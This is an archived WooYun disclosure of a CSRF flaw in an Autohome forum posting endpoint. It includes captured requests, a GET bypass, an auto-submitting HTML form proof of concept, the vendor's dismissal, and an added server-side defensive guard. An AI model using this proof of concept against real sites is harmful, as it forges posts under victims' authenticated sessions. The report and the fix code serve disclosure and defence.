WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2013-07-03: Details have been reported to the vendor and are awaiting handling. 2013-07-06: The vendor proactively ignored the vulnerability; details disclosed to the public.
As the title says.
Affected site: ajax.club.autohome.com.cn
1. Post a thread on the forum and capture the traffic; the following request is obtained:
POST /Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0 HTTP/1.1
Host: ajax.club.autohome.com.cn
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://ajax.club.autohome.com.cn/NewPost/Post?bbs=c&bbsId=2615&urlbbsId=2615&pvareaid=101465
Cookie: 
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 519

tTitle=H2%2C%B4%F3%BC%D2%B6%BC%C0%B4%CB%B5%CB%B5%C4%DC%B5%C8%B4%FD%B5%C4%BC%AB%CF%DE%CA%B1%BC%E4%CA%C7%B6%E0%BE%C3&tRequestSource=AutohomeClub&log_id=&ATopicContent=%CE%D2%D5%E2%D1%F9%B5%C4%8C%C5%CB%BF%CF%D6%D4%DA%CE%DE%B4%E6%BF%EE%A3%AC%BB%B9%D3%D0%B7%BF%B4%FB%A3%AC%CB%F9%D2%D4%C4%DC%B9%BB%B5%C8%B4%FD%A3%AC%B2%BB%D6%AA%B5%C0%B4%F3%BC%D2%CA%C7%D4%F5%C3%B4%CF%EB%B5%C4%A3%AC%C0%B4%CB%B5%CB%B5%B0%C9%A3%A1%3Cimg+class%3D%22spic%22+src%3D%22http%3A%2F%2Fx.autoimg.cn%2Fclub%2FPost%2Fimg%2Fsmiles%2F43.gif%22%3E&tNotify=1
2. The endpoint turns out not to validate requests strictly: the same request can be submitted via GET:
http://ajax.club.autohome.com.cn/Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0&tTitle=H2%2C%B4%F3%BC%D2%B6%BC%C0%B4%CB%B5%CB%B5%C4%DC%B5%C8%B4%FD%B5%C4%BC%AB%CF%DE%CA%B1%BC%E4%CA%C7%B6%E0%BE%C3&tRequestSource=AutohomeClub&log_id=&ATopicContent=%CE%D2%D5%E2%D1%F9%B5%C4%8C%C5%CB%BF%CF%D6%D4%DA%CE%DE%B4%E6%BF%EE%A3%AC%BB%B9%D3%D0%B7%BF%B4%FB%A3%AC%CB%F9%D2%D4%C4%DC%B9%BB%B5%C8%B4%FD%A3%AC%B2%BB%D6%AA%B5%C0%B4%F3%BC%D2%CA%C7%D4%F5%C3%B4%CF%EB%B5%C4%A3%AC%C0%B4%CB%B5%CB%B5%B0%C9%A3%A1%3Cimg+class%3D%22spic%22+src%3D%22http%3A%2F%2Fx.autoimg.cn%2Fclub%2FPost%2Fimg%2Fsmiles%2F43.gif%22%3E&tNotify=1
3. After submitting the GET request, a thread is successfully posted.
4. Not only that, the system does not check the Referer, so threads can be posted via CSRF. Example POC:
<html>
<body>
<form id="mantou" name="mantou" action="http://ajax.club.autohome.com.cn/Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0" method="POST">
  <input type="hidden" name="tTitle" value="your title!" />
  <input type="hidden" name="tRequestSource" value="AutohomeClub" />
  <input type="hidden" name="ATopicContent" value="your content!!!" />
  <input type="hidden" name="Notify" value="1" />
  <input type="submit" value="submit" />
</form>
<script> document.mantou.submit();</script>
</body>
</html>
5. By changing the ID we can post in any forum. Below is a screenshot of the effect after running the POC; I did a quick test.
See the detailed description.
Strictly validate the endpoint and the Referer.
Severity: No impact (vendor ignored)
Ignored at: 2013-07-06 06:54
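To make the recommended fix concrete, here is an added server-side guard for a posting endpoint like TopicPost (example code, not Autohome's implementation). It closes the three weaknesses in the report: GET reaching a state-changing action, a missing or foreign Origin/Referer, and a request that carries no per-session anti-CSRF token. A permission check alone does not help here, because the forged request rides on the victim's own authenticated session. The allowed host list, header names and session/form dictionaries are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: hosts from which the posting form is legitimately served.
ALLOWED_HOSTS = {"ajax.club.autohome.com.cn", "club.autohome.com.cn"}


def issue_csrf_token(session):
    """Bind a fresh random token to the user's session (synchronizer-token
    pattern). The page that renders the posting form embeds this value as a
    hidden field; an attacker's page cannot read it cross-origin."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _source_host(headers):
    """Hostname from Origin, falling back to Referer; None if neither is usable.
    Assumes a plain dict of headers (real frameworks give a case-insensitive map)."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).hostname
    return None


def guard_topic_post(method, headers, form, session):
    """Return (allowed, reason) for a request to the posting action."""
    # 1. A state-changing action must never be reachable via GET.
    if method != "POST":
        return False, "state-changing action must use POST"
    # 2. Origin/Referer must be present and must be one of our own hosts.
    host = _source_host(headers)
    if host is None or host not in ALLOWED_HOSTS:
        return False, "missing or foreign Origin/Referer"
    # 3. The form must carry the token bound to this session; compare in
    #    constant time and tolerate absent/non-ASCII input.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(
        expected.encode("utf-8"), supplied.encode("utf-8")
    ):
        return False, "missing or invalid CSRF token"
    return True, "ok"
```

The GET request and the auto-submitting form in the report both fail this guard: the first on the method check, the second on the Origin/Referer check and then again on the token it cannot know.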
This issue has essentially no impact on us, because user permissions are verified on the server after submission. Thanks for your support of Autohome.
None yet